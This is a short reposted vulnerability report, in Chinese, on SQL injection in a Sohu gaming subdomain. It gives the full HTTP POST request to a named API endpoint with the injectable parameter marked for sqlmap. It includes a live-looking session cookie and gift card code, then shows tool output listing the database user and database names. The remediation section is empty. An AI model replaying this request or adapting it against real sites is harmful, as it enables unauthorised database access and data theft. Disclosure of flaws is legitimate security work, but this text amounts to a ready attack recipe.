欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

搜狐分站存在SQL注入

程序员文章站 2022-06-19 12:34:19
- - ! 站点:game.m.sohu.com POST内容如下: POST /api/sogougift/ HTTP/1.1 Content-Length: 89 Content...

- - !

站点:game.m.sohu.com

POST内容如下:

POST /api/sogougift/ HTTP/1.1

Content-Length: 89

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: https://game.m.sohu.com

Cookie: _smuid=AHbLM0wQqbLil8QXm3Q3lx; game_user=1; IPLOC=CN1100; sg_gift_id1839=1839; card_no1839=3AWQ-NTY7-DEZ5-Z3SB

Host: game.m.sohu.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept: */*

gift_id=1839&smuid=*

web application technology: Nginx

back-end DBMS: MySQL >= 5.0.0

[17:49:09] [INFO] fetching current user

[17:49:09] [WARNING] running in a single-thread mode. Please consider usage of o

ption '--threads' for faster data retrieval

[17:49:09] [INFO] retrieved: game_shouyou@%

current user: 'game_shouyou@%'

current database: 'game_shouyou'

available databases [4]:

[*] game_jifen

[*] game_shouyou

[*] information_schema

[*] test

解决方案:

.